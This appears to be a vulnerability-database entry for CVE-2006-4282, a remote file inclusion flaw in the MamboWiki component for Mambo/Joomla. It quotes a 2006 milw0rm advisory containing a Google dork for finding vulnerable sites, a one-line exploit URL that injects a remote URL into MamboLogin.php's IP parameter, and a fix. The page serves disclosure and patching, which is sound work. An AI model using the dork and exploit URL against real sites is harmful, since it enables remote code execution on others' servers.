MamboWiki组件'MamboLogin.PHP'远程文件包含漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1110850 漏洞类型 输入验证
发布时间 2006-08-18 更新时间 2006-08-26
CVE编号 CVE-2006-4282 CNNVD-ID CNNVD-200608-365
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/2213
https://cxsecurity.com/issue/WLB-2006080145
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200608-365
|漏洞详情
Mambo软件和Joomla软件的MamboWiki组件(com_mambowiki)0.9.6及早期版本中的MamboLogin.php脚本存在PHP远程文件包含漏洞!远程攻击者可借助IP参数中的URL执行任意PHP代码。
|漏洞EXP
.:[ insecurity research team ]:.
     .__..____.:.______.____.:.____ .
 .:. |  |/    \:/  ___// __ \:/   _\.:.
   : |  |   |  \\____\\  ___/\   /__ :. .
 ..: |__|___|  /____  >\___  >\___  >.:
   .:.. ..  .\/   .:\/:.  .\/.  .:\/:
 .   ...:.    .advisory.    .:...
         :..................: 18.o8.2oo6 ..
 
 
  Affected Application: MamboWiki <= v0.9.6

          (Mambo/Joomla CMS Component)
 
 
 . . :[ contact ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  Discoverd by: camino
 
  Team: Insecurity Research Team
 
  URL: http://www.insecurityresearch.org
 
  E-Mail: camino[at]sexmagnet[dot]com
 
 
 
 . . :[ insecure application details ]: . . . . . . . . . . . . . . . . .
 
 
  Typ: Remote [x]  Local [ ]
 
       Remote File Inclusion [x]  SQL Injection [ ]
 
  Level: Low [ ]  Middle [ ]  High [x]
 
  Application: MamboWiki
 
  Version: <= 0.9.6
 
  Vulnerable File: MamboLogin.php
 
  URL: http://www.lyquidity.com
 
  Description: A component like Wikipedia for Jooma/Mambo.
 
  Dork: inurl:"com_mambowiki"
 
 
 
 . . :[ exploit ]: . . . . . . . . . . . . . . . . . . . . . . . . . . .


  http://[sitepath]/[joomlapath]/components/com_mambowiki/ MamboLogin.php?IP=http://huh?
 
 
 . . :[ how to fix ]: . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  o1.) open MamboLogin.php
 
  o2.) add this in line 8:

         defined( '_VALID_MOS' ) or 

         die( 'Direct Access to this location is not allowed.' );

  o3.) done!



 . . :[ greets ]: . . . . . . . . . . . . . . . . . . . . . . . . . . . .
 
 
  my girlfriend, brOmstar, ACiDAngel, PoKi, Waze and all the sexy members of insecurity research team ;-)

# milw0rm.com [2006-08-18]
|参考资料

来源:BID
名称:19594
链接:http://www.securityfocus.com/bid/19594
来源:BUGTRAQ
名称:20060818JoomlaMamboWikiComponent<=0.9.4(MamboLogin.php)RemoteFileInclusionVulnerability
链接:http://www.securityfocus.com/archive/1/archive/1/443706/100/0/threaded
来源:MILW0RM
名称:2213
链接:http://www.milw0rm.com/exploits/2213
来源:MISC
链接:http://www.lyquidity.com/mambo/index.php?option=com_mambowiki&Itemid=134
来源:XF
名称:mambowiki-mambologin-file-include(28463)
链接:http://xforce.iss.net/xforce/xfdb/28463
来源:SREASON
名称:1436
链接:http://securityreason.com/securityalert/1436
来源:MILW0RM
名称:2213
链接:http://milw0rm.com/exploits/2213